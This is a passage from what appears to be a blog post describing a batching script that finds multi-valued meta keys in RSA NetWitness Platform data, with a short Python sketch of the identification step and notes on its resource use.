  2. In order to be as complete in our identification of multi-valued metas as we can, we need a large enough sample size of sessions and metas to be representative of most, if not all, of an organization's data.  And that means we need sample sizes in the hundreds-of-thousands to millions range.

 

But therein lies the rub.  Processing data at that scale requires us to first query the RSA NetWitness Platform databases for all that data, pull it back, and then process it....without flooding the RSA NetWitness Platform with thousands or millions of queries (after all, the analysts still need to do their responding and hunting), without consuming so many resources that the script freezes or crashes the system, and while still producing an accurate result...because otherwise what's the point?

 

I made a number of changes to the initial version of this script in order to limit its potential impact.  The result of these changes was that the script will process batches of sessions and their metas in chunks of 10000.  In my lab environment, my testing with this batch size resulted in roughly 60 seconds between each process iteration.

 

The overall workflow within the script is:

  1. Query the RSA NetWitness Platform for a time range and grab all the resulting sessionids.
  2. Query the RSA NetWitness Platform for 10000 sessions and all their metas at a time.
  3. Receive the results of the query.
  4. Process all the metas to identify those that are multi-valued (a simplified sketch of this step follows the list).
  5. Store the result of #4 for later.
  6. Repeat steps 2-5 until all sessions within the time range have been processed.
  7. Evaluate and deduplicate all the metas from #4/5 (our end result).
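To make step 4 concrete, the following is a highly simplified sketch of the identification logic only (it is not the attached script): a key is treated as multi-valued if it appears more than once within the same session. The sample batch below is hypothetical and stands in for the results of one 10000-session SDK query:

from collections import Counter

def find_multivalued(meta_pairs):
    # meta_pairs: iterable of (sessionid, metakey) tuples from one batch of sessions
    counts = Counter(meta_pairs)
    return {key for (sid, key), n in counts.items() if n > 1}

# Hypothetical sample batch: session 1 carries two 'alias.host' and two 'action' values,
# so both keys are identified as multi-valued.
sample_batch = [
    (1, 'alias.host'), (1, 'alias.host'), (1, 'action'), (1, 'action'),
    (1, 'ip.src'), (2, 'ip.src'), (2, 'action'),
]

multivalued = set()
for batch in [sample_batch]:            # the real script repeats this per 10000-session chunk
    multivalued |= find_multivalued(batch)

print(', '.join(sorted(multivalued)))   # deduplicated, copy/paste-friendly end result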

 

This is the best middle ground I could find among the various factors.

  • A 10000 session batch size will still result in potentially hundreds or thousands of queries to your RSA NetWitness Platform environment
    • The actual time your RSA NetWitness Platform service (Broker or Concentrator) spends responding to each of these should be no more than ~10-15 seconds each.
  • The time required for the script to process each batch of results will end up spacing out each new batch request to about 60 seconds in between.
    • I saw this time drop to as low as 30 seconds during periods of minimal overall activity and utilization on my admin server.
  • The max memory I saw the script utilize in my lab never exceeded 2500MB.
  • The max CPU I saw the script utilize in my lab was 100% of a single CPU.
  • The absolute maximum number of sessions the script will ever process in a single run is 1,677,721. This is a hardcoded limit in the RSA NetWitness SDK API, and I'm not inclined to try and work around that.

 

The output of the script is formatted so you can copy/paste directly from the terminal into the Correlation Server's multi-valued configuration.  Now with all that out of the way, some usage screenshots:

 

 

 

 

Any comments, questions, concerns or issues with the script, please don't hesitate to comment or reach out.
